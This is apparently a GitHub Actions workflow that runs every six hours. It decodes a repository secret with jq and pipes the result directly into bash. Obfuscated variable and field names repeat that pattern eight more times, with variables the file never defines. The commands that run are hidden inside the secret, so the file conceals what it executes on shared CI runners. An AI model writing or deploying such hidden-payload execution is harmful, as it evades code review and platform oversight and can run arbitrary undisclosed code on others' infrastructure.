name: diamonleesub
on:
  workflow_dispatch:
  schedule:
    - cron: '53 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: diamonleesub
        env:
          eso8949: ${{ secrets.eso8949 }}
        run: |
          echo $eso8949 | jq -r .yh067 | /bin/bash
          echo $q349 | jq -r .vu9 | /bin/bash
          echo $nkia78065 | jq -r .sk32744 | /bin/bash
          echo $dixbh9116 | jq -r .xxe6228 | /bin/bash
          echo $rltv21 | jq -r .p26160 | /bin/bash
          echo $vxbx95846 | jq -r .frvwq844 | /bin/bash
          echo $fa3432 | jq -r .n08940 | /bin/bash
          echo $ubp6268 | jq -r .ifp40 | /bin/bash
          echo $bpuxo91576 | jq -r .hj69 | /bin/bash

